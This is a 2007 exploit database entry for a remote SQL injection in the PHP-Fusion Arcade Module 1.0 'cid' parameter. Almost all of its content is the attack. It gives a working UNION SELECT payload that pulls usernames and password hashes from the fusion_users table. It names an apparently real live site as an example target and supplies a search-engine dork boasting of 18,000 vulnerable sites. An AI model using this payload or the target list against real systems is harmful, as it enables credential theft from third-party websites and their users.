PHP-Fusion Module Arcade 1.0 cid Remote SQL Injection Vulnerability

2007-04-02T00:00:00
ID EDB-ID:3640
Type exploitdb
Reporter Mehmet Ince
Modified 2007-04-02T00:00:00

Description

PHP-Fusion Module Arcade 1.0 (cid) Remote SQL Injection Vulnerability. CVE-2007-1978. Webapps exploit for php platform

                                        
                                            --------------------------------

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

--------------------------------

Bulan: xoron

xoron.biz 

--------------------------------

Exploit: 

index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

--------------------------------

Exapmle: http://www.basicwallpapers.dk/infusions/arcade/

--------------------------------

Google Dork:
/infusions/arcade/   18.000 sites:)

--------------------------------

Ekin0x  / -->  evilc0der.org  <--

--------------------------------

# milw0rm.com [2007-04-02]